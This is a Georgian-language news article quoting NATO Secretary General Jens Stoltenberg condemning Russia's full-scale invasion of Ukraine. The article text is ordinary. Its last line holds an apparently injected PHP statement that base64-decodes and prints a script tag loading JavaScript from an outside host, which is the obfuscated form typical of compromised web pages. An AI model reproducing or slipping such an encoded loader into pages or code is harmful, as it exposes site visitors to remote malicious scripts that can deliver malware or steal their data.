celsiusi
ავერსი საქკაბელი
NATO-ს გენერალურმა მდივანმა იენს სტოლტენბერგმა საგანგებო მიმართვის დროს განაცხადა, რომ რუსეთი იმისთვის, რაც გააკეთა უკრაინასთან მიმართებით, დიდ საფასურს გადაიხდის.
 
"მიუხედავად იმისა, რომ გვქონდა მცდელობა დიპლომატიური გზით მოგვეგვარებინა სკითხი, პუტინმა მაინც ვერ შეასრულა ეს პირობა. ჩვენ დიდი ხნის განმავლობაში ვაფრთხილებდით რუსეთს, რომ თუ რუსეთი უკრაინის ტერიტორიაზე შეიჭრებოდა, ჩვენ შესაბამის ზომებს მივიღებდით. დღეს ჩვენ, ჩვენი თავდაცვითი მექანიზმი გავააქტიურეთ, რათა ჩვენს სამხედროებს შესაბამისი მანევრების განხორციელების საშუალება ჰქონდეთ. ვიცოდით, რომ საბოლოოდ რუსეთი შეიჭრებოდა უკრაინაში, რადგან ყველაფერი ამისკენ ვითარდებოდა. რუსეთმა პოლიტიკურ გადაწყვეტილებებს კარი დაუხურა, ახლა კი სამწუხარო რეალობის წინაშე აღმოვჩნდით. ბუნებრივია, ეს უკრაინაზე აისახება. მოსკოვი ამისთვის დიდ საფასურს გადაიხდის. ჩვენ ერთად ვდგავართ და ვგმობთ რუსეთის მხრიდან უკრაინაში ფართომასშტაბიან შეჭრას. ჩვენი ღირებულებები, ახლა რუსეთის აგრესიული ქმედებების წინაშე დგას. ის ქმედებები, რასაც რუსეთი ახორციელებს, დარწმუნებული ვარ გავლენას მოახდენს ჩვენს ურთიერთობებზე. ჩვენ ახლა ახალი რეალობის წინაშე აღმოვჩნდით, ეს არის ახალი ევროპა. სწორედ ამიტომ, ჩვენ ჩვენს მოკავშირეებთან ერთად ვდგავართ,"- განაცხადა იენს სტოლტენბერგმა.
 
 
769
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");